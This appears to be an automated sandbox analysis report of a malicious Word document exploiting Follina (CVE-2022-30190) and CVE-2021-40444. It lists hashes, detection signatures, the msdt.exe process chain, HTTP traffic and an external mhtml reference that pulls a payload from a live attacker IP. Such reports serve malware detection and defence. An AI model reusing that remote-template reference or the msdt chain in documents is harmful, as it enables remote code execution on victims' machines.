Windows Analysis Report
5YMh6S8QVr.docx

Overview

General Information

Sample Name: 5YMh6S8QVr.docx
Analysis ID: 646982
MD5: 5a0d45f97ee4b248360b6b2e5eb4706a
SHA1: e2a00e3489ede1ac935c78b99f92fdce0e74ed69
SHA256: 57b27abbe3d3c0c20cdc1b408ff6fa562ba5f04fa555cb3adb9dcb03e273b664
Tags: 194-34-232-147doc
Infos:

Detection

CVE-2021-40444, Follina CVE-2022-30190
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Detected CVE-2021-40444 exploit
Snort IDS alert for network traffic
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Found dropped PE file which has not been started or loaded
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection

barindex
Source: 5YMh6S8QVr.docx Virustotal: Detection: 50% Perma Link
Source: 5YMh6S8QVr.docx Metadefender: Detection: 31% Perma Link
Source: 5YMh6S8QVr.docx Avira: detected

Exploits

barindex
Source: Yara match File source: 00000007.00000002.556563840.00000000033B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.553310799.0000000000E80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.553669384.00000000031C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\side[1].htm, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\side[1].htm, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\50A7EA9A.htm, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\BEF29DB8.htm, type: DROPPED
Source: document.xml.rels Extracted files from sample: mhtml:http://194.34.232.147/side.html!x-usc:http://194.34.232.147/side.html
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\msdt.exe
Source: global traffic TCP traffic: 192.168.2.3:49746 -> 194.34.232.147:80
Source: global traffic TCP traffic: 192.168.2.3:49747 -> 194.34.232.147:80

Networking

barindex
Source: Traffic Snort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 194.34.232.147:80 -> 192.168.2.22:49176
Source: Joe Sandbox View ASN Name: DEDIPATH-LLCUS DEDIPATH-LLCUS
Source: global traffic HTTP traffic detected: GET /side.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 194.34.232.147Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /side.html HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 194.34.232.147If-Modified-Since: Mon, 30 May 2022 20:51:09 GMTIf-None-Match: "1a76-5e040d0ca4940-gzip"Connection: Keep-Alive
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 16 Jun 2022 11:36:26 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Mon, 30 May 2022 20:51:09 GMTETag: "1a76-5e040d0ca4940-gzip"Accept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 289Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed d9 4d 4b c3 30 18 07 f0 fb 60 df 21 16 61 db c1 06 f4 a6 ad e2 db 60 20 32 9c 30 0f 82 a4 c9 b3 36 98 36 25 89 d4 7e 7b 93 81 03 6f 9e c4 c3 3f 04 9e bc 3e bf e4 fc 14 47 ca ca 30 f6 c4 9a d0 9a cb e9 a4 48 91 19 d1 d5 65 46 5d 96 56 2a ab c6 14 bd 74 ba 0f 71 c4 f9 f5 1f 34 38 70 e0 c0 81 03 07 0e 1c 38 70 e0 c0 81 03 07 0e 1c 38 70 e0 c0 81 03 07 0e 9c ff eb b0 d8 06 dd 29 3b e4 c6 4a 11 b4 ed f2 c6 d1 8e 95 2c 6b fd 49 eb 55 38 e7 5a b1 f5 ed f6 4e 8b ba b3 3e 68 c9 b8 7f d7 3d db 59 27 89 f1 5e 38 d1 b2 d7 6c f5 fc f6 44 95 b3 83 a7 a5 75 4b 6d a8 94 c2 5c 49 16 37 36 64 48 86 b5 b3 75 3c 5b 3e da f0 a0 7d 20 95 b6 6e 7e dc 68 8e e7 ab fb 97 f9 2c de 94 39 7d d2 6c b1 d0 3c cf 7f db b7 fb af 78 be 19 63 fa f6 ec 94 b7 bd d7 b5 0f 1f 55 4a 16 1f 99 5d 4c 27 05 3f 94 8b d2 e4 bb 86 c4 f7 65 a6 2f c8 88 30 4c 76 1a 00 00 Data Ascii: MK0`!a` 2066%~{o?>G0HeF]V*tq48p8p8p);J,kIU8ZN>h=Y'^8lDuKm\I76dHu<[>} n~h,9}l<xcUJ]L'?e/0Lv
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 16 Jun 2022 11:36:27 GMTServer: Apache/2.4.29 (Ubuntu)Last-Modified: Mon, 30 May 2022 20:51:09 GMTETag: "1a76-5e040d0ca4940-gzip"Accept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 289Keep-Alive: timeout=5, max=97Connection: Keep-AliveContent-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ed d9 4d 4b c3 30 18 07 f0 fb 60 df 21 16 61 db c1 06 f4 a6 ad e2 db 60 20 32 9c 30 0f 82 a4 c9 b3 36 98 36 25 89 d4 7e 7b 93 81 03 6f 9e c4 c3 3f 04 9e bc 3e bf e4 fc 14 47 ca ca 30 f6 c4 9a d0 9a cb e9 a4 48 91 19 d1 d5 65 46 5d 96 56 2a ab c6 14 bd 74 ba 0f 71 c4 f9 f5 1f 34 38 70 e0 c0 81 03 07 0e 1c 38 70 e0 c0 81 03 07 0e 1c 38 70 e0 c0 81 03 07 0e 9c ff eb b0 d8 06 dd 29 3b e4 c6 4a 11 b4 ed f2 c6 d1 8e 95 2c 6b fd 49 eb 55 38 e7 5a b1 f5 ed f6 4e 8b ba b3 3e 68 c9 b8 7f d7 3d db 59 27 89 f1 5e 38 d1 b2 d7 6c f5 fc f6 44 95 b3 83 a7 a5 75 4b 6d a8 94 c2 5c 49 16 37 36 64 48 86 b5 b3 75 3c 5b 3e da f0 a0 7d 20 95 b6 6e 7e dc 68 8e e7 ab fb 97 f9 2c de 94 39 7d d2 6c b1 d0 3c cf 7f db b7 fb af 78 be 19 63 fa f6 ec 94 b7 bd d7 b5 0f 1f 55 4a 16 1f 99 5d 4c 27 05 3f 94 8b d2 e4 bb 86 c4 f7 65 a6 2f c8 88 30 4c 76 1a 00 00 Data Ascii: MK0`!a` 2066%~{o?>G0HeF]V*tq48p8p8p);J,kIU8ZN>h=Y'^8lDuKm\I76dHu<[>} n~h,9}l<xcUJ]L'?e/0Lv
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: unknown TCP traffic detected without corresponding DNS query: 194.34.232.147
Source: ~WRS{FDDAADEE-C8D9-4F13-9F2E-152CDB73CD3C}.tmp.0.dr String found in binary or memory: http://194.34.232.147/side.html
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://api.aadrm.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://api.aadrm.com/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://api.addins.store.office.com/addinstemplate
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://api.addins.store.office.com/app/query
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://api.cortana.ai
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://api.diagnostics.office.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://api.microsoftstream.com/api/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://api.office.net
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://api.onedrive.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://apis.live.net/v5.0/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://augloop.office.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://augloop.office.com/v2
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://cdn.entity.
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://clients.config.office.net/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://clients.config.office.net/c2r/v1.0/InteractiveInstallation
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://config.edge.skype.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://cortana.ai
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://cortana.ai/api
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://cr.office.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://dataservice.o365filtering.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://dataservice.o365filtering.com/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://dev.cortana.ai
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://devnull.onenote.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://directory.services.
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://edu-mathreco-prod.trafficmanager.net
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://edu-mathsolver-prod.trafficmanager.net
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://enrichment.osi.office.net/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://entitlement.diagnostics.office.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://graph.ppe.windows.net
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://graph.ppe.windows.net/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://graph.windows.net
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://graph.windows.net/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?secureurl=1
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://incidents.diagnostics.office.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://inclient.store.office.com/gyro/client
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://inclient.store.office.com/gyro/clientstore
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://invites.office.com/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://lifecycle.office.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://login.microsoftonline.com/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://login.windows.local
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://management.azure.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://management.azure.com/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://messaging.action.office.com/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://messaging.action.office.com/setcampaignaction
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://messaging.action.office.com/setuseraction16
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://messaging.engagement.office.com/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://messaging.engagement.office.com/campaignmetadataaggregator
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://messaging.lifecycle.office.com/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://messaging.lifecycle.office.com/getcustommessage16
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://messaging.office.com/
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://metadata.templates.cdn.office.net/client/log
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://ncus.contentsync.
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://ncus.pagecontentsync.
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: 6CA48D48-8B92-487D-A989-7731B3AEAC08.0.dr String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
